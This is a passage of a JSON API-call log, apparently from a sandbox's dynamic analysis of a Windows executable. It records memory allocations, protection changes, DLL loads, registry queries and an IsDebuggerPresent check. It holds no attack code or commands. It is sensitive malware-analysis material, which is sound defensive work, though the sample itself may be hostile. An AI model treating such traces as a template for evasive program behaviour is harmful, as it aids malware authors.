"0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 29 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400d5319", "parentcaller": "0x1400d0b23", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x054c3000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400d37d5", "parentcaller": "0x1400cad15", "category": "hooking", "api": "SetUnhandledExceptionFilter", "status": true, "return": "0x00000001", "arguments": [ { "name": "ExceptionFilter", "value": "0x1400d3780" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400aa4ba", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05350000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400aa4ba", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05350000" }, { "name": "RegionSize", "value": "0x00012000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbba6", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x054c5000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\system32\\rpcss.dll" }, { "name": "ModuleHandle", "value": "0x00000202" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "misc", "api": "NtQuerySystemInformation", "status": true, "return": "0x00000000", "arguments": [ { "name": "SystemInformationClass", "value": "0", "pretty_value": "FILE_SUPERSEDE" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "42" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "2188" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "kernel.appcore.dll" } ], "repeated": 0, "id": 39 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\kernel.appcore.dll" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000001d0" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\kernel.appcore.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 41 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000001cc" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000001d0" }, { "name": "FileName", "value": "C:\\Windows\\System32\\kernel.appcore.dll" } ], "repeated": 0, "id": 42 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000001cc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedea70000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00012000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedea7f000" }, { "name": "ModuleName", "value": "kernel.appcore.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedea75000" }, { "name": "ModuleName", "value": "kernel.appcore.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001cc" } ], "repeated": 0, "id": 46 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001d0" } ], "repeated": 0, "id": 47 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedea75000" }, { "name": "ModuleName", "value": "kernel.appcore.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 48 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\kernel.appcore" }, { "name": "DllBase", "value": "0x7ffedea70000" } ], "repeated": 0, "id": 49 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\kernel.appcore" }, { "name": "BaseAddress", "value": "0x7ffedea70000" }, { "name": "InitRoutine", "value": "0x7ffedea73f10" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 50 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee3271000" }, { "name": "ModuleName", "value": "combase.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 51 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee3271000" }, { "name": "ModuleName", "value": "combase.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 52 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 53 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000001cc" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "bcryptPrimitives.dll" } ], "repeated": 0, "id": 54 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000001cc" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee1390000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00082000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 55 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee13f7000" }, { "name": "ModuleName", "value": "bcryptPrimitives.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 56 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001cc" } ], "repeated": 0, "id": 57 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee13f7000" }, { "name": "ModuleName", "value": "bcryptPrimitives.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 58 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\bcryptPrimitives" }, { "name": "DllBase", "value": "0x7ffee1390000" } ], "repeated": 0, "id": 59 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000234" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy" } ], "repeated": 0, "id": 60 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000234" }, { "name": "ValueName", "value": "STE" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE" } ], "repeated": 0, "id": 61 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000234" } ], "repeated": 0, "id": 62 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000234" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\FipsAlgorithmPolicy" } ], "repeated": 0, "id": 63 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000234" }, { "name": "ValueName", "value": "Enabled" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled" } ], "repeated": 0, "id": 64 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000238" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Lsa" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa" } ], "repeated": 0, "id": 65 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000238" }, { "name": "ValueName", "value": "FipsAlgorithmPolicy" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy" } ], "repeated": 0, "id": 66 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000234" }, { "name": "ValueName", "value": "MDMEnabled" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled" } ], "repeated": 0, "id": 67 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000234" } ], "repeated": 0, "id": 68 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 69 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Policies\\Microsoft\\Cryptography\\Configuration" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Policies\\Microsoft\\Cryptography\\Configuration" } ], "repeated": 0, "id": 70 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000238" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "\\Device\\CNG" }, { "name": "ShareAccess", "value": "7", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 71 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "device", "api": "DeviceIoControl", "status": true, "return": "0x00000001", "arguments": [ { "name": "DeviceHandle", "value": "0x00000238" }, { "name": "IoControlCode", "value": "0x00390008", "pretty_value": "IOCTL_KSEC_RANDOM_FILL_BUFFER" }, { "name": "InBuffer", "value": "" }, { "name": "OutBuffer", "value": "}U\\x8e\\x8cG\\x04\\x12\\x92\r~\\xc7J\r\\xb32\\xf8{H\\x8e\\xe2\\x08\\xce\\x97Y\\x91\\x85\\xfb\\x8d\\xb0k_\\xae?a\\xce\\x99\\x13\\xff\\xf0\\xc4\\xd7\\x18\\x1c\\+\\xcb\\x17>" } ], "repeated": 0, "id": 72 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives" }, { "name": "BaseAddress", "value": "0x7ffee1390000" }, { "name": "InitRoutine", "value": "0x7ffee13c8b60" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 73 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee345e000" }, { "name": "ModuleName", "value": "RPCRT4.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 74 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee345e000" }, { "name": "ModuleName", "value": "RPCRT4.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 75 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x008d1000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 76 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee3271000" }, { "name": "ModuleName", "value": "combase.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 77 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee3271000" }, { "name": "ModuleName", "value": "combase.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 78 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\uxtheme" }, { "name": "DllBase", "value": "0x7ffede5b0000" } ], "repeated": 0, "id": 79 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\uxtheme.dll" }, { "name": "BaseAddress", "value": "0x7ffede5b0000" } ], "repeated": 0, "id": 80 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffede5b0000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\system32\\uxtheme.dll" }, { "name": "dwFlags", "value": "0x00000008" } ], "repeated": 0, "id": 81 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "uxtheme.dll" }, { "name": "ModuleHandle", "value": "0x7ffede5b0000" }, { "name": "FunctionName", "value": "ThemeInitApiHook" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffede5bcde0" } ], "repeated": 0, "id": 82 }, { "timestamp": "2025-11-20 10:58:26,047", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "system", "api": "IsDebuggerPresent", "status": false, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 83 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": " \\xee\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 84 }, { "timestamp": "2025-11-20 10:58:26,062", "thread_id": "2188", "caller": "0x14001e96d", "parentcaller": "0x1400df209", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "DesiredAccess", "value": "0x00020019", 